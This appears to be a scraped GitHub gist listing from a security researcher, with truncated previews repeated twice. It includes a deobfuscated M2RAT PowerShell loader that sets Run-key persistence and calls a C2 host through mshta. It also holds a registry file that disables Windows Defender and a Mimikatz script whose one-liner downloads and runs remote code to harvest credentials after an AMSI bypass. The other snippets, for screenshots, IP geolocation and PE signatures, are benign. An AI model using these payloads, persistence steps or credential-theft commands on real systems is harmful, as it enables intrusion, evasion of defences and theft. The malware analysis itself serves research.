Sh1n0g1 Sh1n0g1

## M2RAT.ps1
# Deobfuscated M2RAT
# Refer: https://asec.ahnlab.com/en/56857/
Start-Sleep -Seconds 68;
$buffer = 1024 * 1024;
$hostid = $env:COMPUTERNAME + '-' + $env:USERNAME;
$C2_URL = 'http://navercorp.ru/dashboard/image/202302/com.php' + '?U=' + $hostid;
$TEMPORARY_FILE = $env:TEMP + '\jXShAegMEWMw';
if (!(Test-Path$TEMPORARY_FILE)) {
  New-ItemProperty -Path HKCU:\Software\ Microsoft\Windows\CurrentVersion\Run -Name fGZtM -Value 'c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 391763 2.2.2.2 || mshta http://navercorp.ru/dashboard/image/202302/4.html' -PropertyType String -Force;
}

## shodan-query.ipynb

      
              1 file
            
          
              0 forks
            
          
                0 comments
              
            
              0 stars
            
          
                Sh1n0g1
                / shodan-query.ipynb
            
            
              Last active
              July 21, 2023 04:52
            
              
                Shodan Query.ipynb
              
          
      Loading

      Sorry, something went wrong. Reload?
      Sorry, we cannot display this file.
      Sorry, this file is invalid so it cannot be displayed.
      
          Viewer requires iframe.
      
    
## youtube-summarizer-with-langchain-chatgpt.ipynb

      
              1 file
            
          
              0 forks
            
          
                0 comments
              
            
              0 stars
            
          
                Sh1n0g1
                / youtube-summarizer-with-langchain-chatgpt.ipynb
            
            
              Last active
              May 25, 2023 04:15
            
              
                youtube-summarizer-with-langchain-chatgpt.ipynb
              
          
      Loading

      Sorry, something went wrong. Reload?
      Sorry, we cannot display this file.
      Sorry, this file is invalid so it cannot be displayed.
      
          Viewer requires iframe.
      
    
## shinolang.ipynb

      
              1 file
            
          
              0 forks
            
          
                0 comments
              
            
              1 star
            
          
                Sh1n0g1
                / shinolang.ipynb
            
            
              Created
              May 20, 2023 01:29
            
              
                ShinoLang.ipynb
              
          
      Loading

      Sorry, something went wrong. Reload?
      Sorry, we cannot display this file.
      Sorry, this file is invalid so it cannot be displayed.
      
          Viewer requires iframe.
      
    
## DisableWindowsDefender2022.reg
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender]
"DisableAntiSpyware"=dword:00000001
"DisableRealtimeMonitoring"=dword:00000001
"DisableAntiVirus"=dword:00000001
"DisableSpecialRunningModes"=dword:00000001
"DisableRoutinelyTakingAction"=dword:00000001
"ServiceKeepAlive"=dword:00000000

## Invoke-OneShot-Mimikatz.ps1
# Confirm it works in Windows 10 2022

# Dont download this but execute the next line in command prompt(cmd.exe)
# powershell iex (wget https://gist.githubusercontent.com/Sh1n0g1/b93b48a54276145bd117403a38fd9816/raw/637d7447dc7a99e21cfeec18bec950abbc1bd642/Invoke-OneShot-Mimikatz.ps1).Content
# You will get creds
#
# AMSI Bypass is copied from payatu's AMSI-Bypass (23-August-2021)
# https://payatu.com/blog/arun.nair/amsi-bypass
$code = @"
using System;

## ScreenShot.ps1
[Reflection.Assembly]::LoadWithPartialName("System.Drawing")
function screenshot([Drawing.Rectangle]$bounds, $path) {
   $bmp = New-Object Drawing.Bitmap $bounds.width, $bounds.height
   $graphics = [Drawing.Graphics]::FromImage($bmp)

   $graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size)

   $bmp.Save($path)

   $graphics.Dispose()

## Get-ActiveTime.ps1
#Initialize
$Weekday=@("Monday","Tuesday","Wednesday","Thursday","Friday","Saturday","Sunday")
$LoginData=@{}
ForEach($w in $Weekday){
	$LoginData[$w]=@{}
	0..23 | % {$LoginData[$w][$_]=0}
}

#Get the data from Eventlog
$i=0

## ip2geo.py
#Bulk IP Address 2 Geolocation Using freegeoip.net

#Input:  IP Address List
#Output: IP, Latitude, Longitude (CSV Format)


import urllib, json

#Paste your ipaddress list
ips="""

## pefile_peid.py
import sys
import peutils
import pefile

try:
	pe =  pefile.PE(sys.argv[1])
	signatures = peutils.SignatureDatabase('./sig/userdb.txt')
	matches = signatures.match_all(pe, ep_only = True)
	if type(matches) is list:
		for m in matches:
	# Deobfuscated M2RAT
	# Refer: https://asec.ahnlab.com/en/56857/
	Start-Sleep -Seconds 68;
	$buffer = 1024 * 1024;
	$hostid = $env:COMPUTERNAME + '-' + $env:USERNAME;
	$C2_URL = 'http://navercorp.ru/dashboard/image/202302/com.php' + '?U=' + $hostid;
	$TEMPORARY_FILE = $env:TEMP + '\jXShAegMEWMw';
	if (!(Test-Path$TEMPORARY_FILE)) {
	New-ItemProperty -Path HKCU:\Software\ Microsoft\Windows\CurrentVersion\Run -Name fGZtM -Value 'c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 391763 2.2.2.2 \|\| mshta http://navercorp.ru/dashboard/image/202302/4.html' -PropertyType String -Force;
	}
	Windows Registry Editor Version 5.00

	[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender]
	"DisableAntiSpyware"=dword:00000001
	"DisableRealtimeMonitoring"=dword:00000001
	"DisableAntiVirus"=dword:00000001
	"DisableSpecialRunningModes"=dword:00000001
	"DisableRoutinelyTakingAction"=dword:00000001
	"ServiceKeepAlive"=dword:00000000
	# Confirm it works in Windows 10 2022

	# Dont download this but execute the next line in command prompt(cmd.exe)
	# powershell iex (wget https://gist.githubusercontent.com/Sh1n0g1/b93b48a54276145bd117403a38fd9816/raw/637d7447dc7a99e21cfeec18bec950abbc1bd642/Invoke-OneShot-Mimikatz.ps1).Content
	# You will get creds
	#
	# AMSI Bypass is copied from payatu's AMSI-Bypass (23-August-2021)
	# https://payatu.com/blog/arun.nair/amsi-bypass
	$code = @"
	using System;
	[Reflection.Assembly]::LoadWithPartialName("System.Drawing")
	function screenshot([Drawing.Rectangle]$bounds, $path) {
	$bmp = New-Object Drawing.Bitmap $bounds.width, $bounds.height
	$graphics = [Drawing.Graphics]::FromImage($bmp)

	$graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size)

	$bmp.Save($path)

	$graphics.Dispose()
	#Initialize
	$Weekday=@("Monday","Tuesday","Wednesday","Thursday","Friday","Saturday","Sunday")
	$LoginData=@{}
	ForEach($w in $Weekday){
	$LoginData[$w]=@{}
	0..23 \| % {$LoginData[$w][$_]=0}
	}

	#Get the data from Eventlog
	$i=0
	#Bulk IP Address 2 Geolocation Using freegeoip.net

	#Input: IP Address List
	#Output: IP, Latitude, Longitude (CSV Format)


	import urllib, json

	#Paste your ipaddress list
	ips="""
	import sys
	import peutils
	import pefile

	try:
	pe = pefile.PE(sys.argv[1])
	signatures = peutils.SignatureDatabase('./sig/userdb.txt')
	matches = signatures.match_all(pe, ep_only = True)
	if type(matches) is list:
	for m in matches: